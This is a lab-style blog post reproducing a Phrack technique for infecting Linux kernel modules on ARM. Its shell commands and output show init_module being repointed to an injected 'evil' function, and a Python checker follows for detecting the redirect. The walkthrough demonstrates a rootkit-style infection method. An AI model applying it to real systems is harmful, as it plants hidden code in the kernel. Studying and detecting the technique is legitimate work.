Interesting article in Phrack))) I implemented some sources.
I made it for ARM with the CodeSourcery toolchain.
One issue in the article:
Of course, here it must be 0x15 instead of 0x1b.
One more thing:
nika@nika-u:~/study/src/various_sources/various/elf_inject$ arm-linux-gnueabi-readelf -s simple.ko
Symbol table '.symtab' contains 58 entries:
Num: Value Size Type Bind Vis Ndx Name
...
49: 00000000 40 FUNC GLOBAL DEFAULT 1 evil
...
55: 00000028 40 FUNC GLOBAL DEFAULT 1 init
56: 00000050 28 FUNC GLOBAL DEFAULT 1 extt
Look at the value of the evil() function. It's 0x0. WTF??) But that's normal: it's not an undefined symbol, it's just the first function, at offset 0x0 (this fact is not highlighted in the Phrack article).
And an example with my sources:
nika@nika-u:~/study/src/various_sources/various/elf_inject$ ./build.sh
nika@nika-u:~/study/src/various_sources/various/elf_inject$ ./symb_globalize.sh
nika@nika-u:~/study/src/various_sources/various/elf_inject$ ./link_new.sh
nika@nika-u:~/study/src/various_sources/various/elf_inject$ arm-linux-gnueabi-readelf -s new4.ko | grep evil
52: 00000000 0 FILE LOCAL DEFAULT ABS evil4.c
63: 00000000 0 FILE LOCAL DEFAULT ABS evil4.mod.c
70: 00000028 40 FUNC GLOBAL DEFAULT 4 evil
nika@nika-u:~/study/src/various_sources/various/elf_inject$ arm-linux-gnueabi-readelf -s new4.ko | grep init
74: 00000000 40 FUNC GLOBAL DEFAULT 4 init_module
76: 00000000 40 FUNC GLOBAL DEFAULT 4 init
nika@nika-u:~/study/src/various_sources/various/elf_inject$ gcc elf-inject_for3.c
nika@nika-u:~/study/src/various_sources/various/elf_inject$ ./a.out new4.ko init_module 0x28
elf open...OK
check elf...OK
Number of sections inside elf: 43
found STRTAB section id:42 offs:0x00ce74... Ok
found symtab section id:43 number of symbols:78...OK
found init_module symbol id:74
elf patched...Ok
nika@nika-u:~/study/src/various_sources/various/elf_inject$
And on the target (QEMU):
# insmod new4.ko
# lsmod
Module Size Used by Tainted: G
simple4 1305 0
# rmmod simple4
# dmesg
....
/home/nika/study/src/various_sources/various/elf_inject/evil4.c: evil(): Injected
/home/nika/study/src/various_sources/various/elf_inject/simple4.c: init(): Hello, world!
/home/nika/study/src/various_sources/various/elf_inject/simple4.c: extt(): Goodbue, world!
#
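A defender-side check of the two points above, as an added example (not code from this post or from the Phrack article): it parses an ELF32 symbol table, treats a symbol as undefined only when Ndx is UND rather than when Value is 0, and reports which function init_module resolves to. The sample image, its placeholder section headers and the printk import are constructed; the offsets 0x0/0x28 and Ndx 4 follow the new4.ko listing.

```python
import struct

SHT_SYMTAB, SHN_UNDEF, STT_FUNC = 2, 0, 2

def symbols(elf):
    """Parse an ELF32 little-endian image; return {name: (type, shndx, value)}."""
    if elf[:6] != b"\x7fELF\x01\x01":
        raise ValueError("expected ELF32 little-endian")
    (shoff,) = struct.unpack_from("<I", elf, 0x20)
    shentsize, shnum = struct.unpack_from("<HH", elf, 0x2E)
    shdrs = [struct.unpack_from("<10I", elf, shoff + i * shentsize) for i in range(shnum)]
    out = {}
    for _, sh_type, _, _, off, size, link, _, _, entsize in shdrs:
        if sh_type != SHT_SYMTAB:
            continue
        str_off = shdrs[link][4]  # sh_link of .symtab names its string table
        for pos in range(off + entsize, off + size, entsize):  # skip null symbol 0
            name, value, _, info, _, shndx = struct.unpack_from("<IIIBBH", elf, pos)
            text = elf[str_off + name:elf.index(b"\0", str_off + name)].decode()
            out[text] = (info & 0xF, shndx, value)
    return out

def entry_target(elf, entry="init_module"):
    """Names of defined FUNC symbols at the same (section, offset) as `entry`."""
    syms = symbols(elf)
    _, shndx, value = syms[entry]
    if shndx == SHN_UNDEF:  # undefined means Ndx is UND; Value 0 alone does not
        return []
    return sorted(n for n, s in syms.items() if n != entry and s == (STT_FUNC, shndx, value))

def build_sample(init_module_value):
    """Constructed ELF32 image; symbol offsets and Ndx 4 follow the new4.ko listing."""
    strtab = b"\0init\0evil\0init_module\0printk\0"
    def sym(name, value, size, info, shndx):
        return struct.pack("<IIIBBH", strtab.index(b"\0" + name + b"\0") + 1, value, size, info, 0, shndx)
    symtab = (bytes(16) + sym(b"init", 0x00, 40, 0x12, 4) + sym(b"evil", 0x28, 40, 0x12, 4)
              + sym(b"init_module", init_module_value, 40, 0x12, 4)
              + sym(b"printk", 0, 0, 0x10, SHN_UNDEF))  # printk: constructed undefined import
    shoff = 52 + len(symtab) + len(strtab)
    ehdr = b"\x7fELF\x01\x01\x01" + bytes(9) + struct.pack(
        "<HHIIIIIHHHHHH", 1, 40, 1, 0, 0, shoff, 0, 52, 0, 0, 40, 7, 0)
    shdrs = (bytes(40 * 5)  # placeholder headers 0-4; index 4 stands in for the code section
             + struct.pack("<10I", 0, SHT_SYMTAB, 0, 0, 52, len(symtab), 6, 1, 4, 16)
             + struct.pack("<10I", 0, 3, 0, 0, 52 + len(symtab), len(strtab), 0, 0, 1, 0))
    return ehdr + symtab + strtab + shdrs

if __name__ == "__main__":
    for label, value in (("before patch", 0x00), ("after patch", 0x28)):
        print(label, "-> init_module resolves to", entry_target(build_sample(value)))
```

A module whose init_module does not land on the function its source registers as the init routine deserves a closer look before it is loaded.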
For any other questions, refer to the Phrack article)
TODO
Do the globalize step by hand)))